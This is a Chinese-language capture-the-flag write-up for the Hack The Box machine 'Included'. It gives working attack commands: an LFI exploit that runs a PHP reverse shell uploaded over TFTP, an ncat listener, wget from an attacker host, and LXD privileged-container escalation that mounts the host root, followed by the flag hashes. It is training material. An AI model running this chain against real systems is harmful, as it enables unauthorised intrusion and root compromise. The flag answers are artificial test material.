HTB-Included

一、 目标计算机上通过 UDP运行什么服务？

#使用nmap扫描IP
nmpa -sU IP
tftp

二、托管在端口 80 上的网页容易受到哪类漏洞的攻击？

#本地文件包含
Local File Inclusion

三、TFTP 用于存储文件的默认系统文件夹是什么？

/var/lib/tftpboot/

四、哪个有趣的文件位于Web服务器文件夹中，可用于横向移动？

#使用gobuster扫目录
gobuster dir -u http://IP -w /usr/share/dirb/wordlists/comment.txt
#访问http://IP/file=.htpasswd
.htpasswd

五、用户 Mike 所属并可被利用进行权限提升的组是什么？

#利用tftp上传PHPshell到靶机
tftp 靶机IP
put /usr/share/webshells/php-reverse-shell.php
#在web中访问shell，shell在tftp默认存储目录
http://IP/?file=/var/lib/tftpboot/php-reverse-shell.php
ncat -lvnp 4444
#提升为ttyshell
SHELL=/bin/bash script -q /dev/null
#切换到mike用户
su mike 
#查看mike所属组
groups
lxd

六、当使用映像通过容器利用系统时，我们寻找一个非常小的发行版。我们最喜欢这项任务以山脉命名。该发行版名称是什么？

#google搜索提示内容
Alpine

七、我们为容器设置什么标志，以便它在主机系统上具有 root 权限？

security.privileged=true

八、如果根文件系统挂载在容器中的 /mnt 处，那么挂载主机系统后，在容器上的什么位置可以找到根标志？

#下载利用工具
git clone https://github.com/saghul/lxd-alpine-builder.git
#编译工具
sudo ./build-alpine
#开启python的web服务
python3 -m http.server 80
#在靶机中下载编译完成的tar包
wget http://10.10.14.35/alpine-v3.17-x86_64-20230316_0437.tar.gz
#使用lxc以镜像的方式导入tar包
lxc image import ./alpine-v3.17-x86_64-20230316_0437.tar.gz --alias myimages
#查看image列表
lxc image list
#设置容器标志，给予root权限
lxc init myimages ignite -c security.privileged=true
#将宿主机的/mnt/root/挂载到容器下
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
#启动容器
lxc start ignite
#执行shell
lxc exec ignite /bin/sh
#查看id
id
#寻找root.txt
find / type f -name root.txt 2>/dev/null
/mnt/root/

九、提交user

#文件路径为/mnt/root/home/mike/user.txt
cat /mnt/root/home/mike/user.txt
a56ef91d70cfbf2cdb8f454c006935a1

十、提交root

#文件路径为/mnt/root/root/root.txt
cat /mnt/root/root/root.txt
c693d9c7499d9f572ee375d4c14c7bcf

总结

• LXD提权过程
• 本地文件读取漏洞的利用